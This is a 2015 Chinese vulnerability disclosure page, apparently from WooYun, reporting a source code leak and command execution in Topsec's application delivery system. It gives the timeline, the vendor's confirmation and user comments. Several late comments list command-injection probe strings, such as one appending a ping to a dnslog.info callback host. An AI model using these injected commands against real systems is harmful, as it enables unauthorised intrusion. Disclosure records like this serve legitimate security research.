漏洞概要
关注数(24)
关注此漏洞
漏洞标题:天融信应用交付系统源码泄漏+用cloudeye神器秒杀命令执行
提交时间:2015-04-02 18:46
修复时间:2015-05-24 18:08
公开时间:2015-05-24 18:08
漏洞类型:敏感信息泄露
危害等级:中
自评Rank:8
漏洞状态:厂商已经确认
Tags标签:
无
漏洞详情
披露状态:
2015-04-02: 细节已通知厂商并且等待厂商处理中
2015-04-09: 厂商已经确认,细节仅向厂商公开
2015-04-19: 细节向核心白帽子及相关领域专家公开
2015-04-29: 细节向普通白帽子公开
2015-05-09: 细节向实习白帽子公开
2015-05-24: 细节向公众公开
简要描述:
天融信应用交付系统源码泄漏
天融信1995年成立,总部设在北京。作为中国信息安全行业领导企业,多年来天融信人凭借着高度民族使命感和责任感,秉承“融天下英才、筑可信网络”的人才理念,成功打造出中国信息安全产业领先品牌TOPSEC。
详细说明:
太复杂了,看代码不爽,直接黑盒搞个命令执行看看
漏洞证明:
修复方案:
版权声明:转载请注明来源 Alen@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:20
确认时间:2015-04-09 18:07
厂商回复:
感谢您的漏洞报送,产品问题正在修复中。
最新状态:
暂无
漏洞评价:
评论
-
2015-04-02 18:54 |
浩天 ( 普通白帽子 | Rank:915 漏洞数:79 | 度假中...)
-
2015-04-02 18:56 |
Alen ( 实习白帽子 | Rank:86 漏洞数:21 | 精华漏洞数:10 | WooYun认证√ Duang)
-
2015-04-02 18:57 |
浩天 ( 普通白帽子 | Rank:915 漏洞数:79 | 度假中...)
-
2015-04-02 19:02 |
疯狗 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)
-
2015-04-02 19:07 |
带馅儿馒头 ( 普通白帽子 | Rank:1278 漏洞数:143 | 心在,梦在)
-
2015-04-02 19:18 |
boooooom ( 普通白帽子 | Rank:467 漏洞数:50 | 我有一个好想法!)
-
2015-04-02 19:22 |
毕月乌 ( 普通白帽子 | Rank:120 漏洞数:16 | 猜猜我是谁?)
-
2015-04-02 19:30 |
毛猴 ( 实习白帽子 | Rank:63 漏洞数:18 | 一 只 怀 有 梦 想 的 猴 ......)
天融信看这里!!!!!!!!!!天融信看这里!!!!!!!!!!天融信看这里!!!!!!!!!!天融信看这里!!!!!!!!!!天融信看这里!!!!!!!!!!
-
2015-04-02 20:00 |
Alen ( 实习白帽子 | Rank:86 漏洞数:21 | 精华漏洞数:10 | WooYun认证√ Duang)
-
2015-04-02 20:20 |
李旭敏 ( 普通白帽子 | Rank:469 漏洞数:71 | ฏ๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎...)
-
2015-04-02 20:26 |
Fire ant ( 实习白帽子 | Rank:73 漏洞数:26 | 他们回来了................)
-
2015-04-02 20:26 |
f4ckbaidu ( 普通白帽子 | Rank:182 漏洞数:23 | 开发真是日了狗了)
-
2015-04-02 23:06 |
小红猪 ( 普通白帽子 | Rank:194 漏洞数:30 | Wow~~~哈哈~~~)
-
2015-04-02 23:21 |
_Thorns ( 普通白帽子 | Rank:882 漏洞数:157 | 收wb 1:5 无限量收 [平台担保]))
-
2015-04-03 11:39 |
开心一下1313 ( 实习白帽子 | Rank:63 漏洞数:20 | 喝口水,压压惊......)
-
2015-04-03 11:47 |
大大灰狼 ( 普通白帽子 | Rank:248 漏洞数:53 | Newbie)
-
2015-05-01 10:25 |
wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)
-
2015-05-24 20:41 |
❤ ( 普通白帽子 | Rank:276 漏洞数:69 | ❤)
-
2015-05-24 20:50 |
f4ckbaidu ( 普通白帽子 | Rank:182 漏洞数:23 | 开发真是日了狗了)
-
2015-05-25 01:31 |
小2b ( 路人 | Rank:2 漏洞数:1 | 努力赚钱)
-
2015-05-25 22:31 |
qhwlpg ( 普通白帽子 | Rank:226 漏洞数:54 | 潜心代码审计。)
@Alen 请问除了; ping 333d61.dnslog.info; echo这种,还有啥姿势?
-
2015-08-11 14:58 |
Master ( 路人 | Rank:29 漏洞数:10 )
还有 telnet www.baidu.com;echo tracert www.1.com;echo
-
2015-08-11 14:58 |
Master ( 路人 | Rank:29 漏洞数:10 )
@qhwlpg 还有 telnet www.baidu.com;echo tracert www.1.com;echo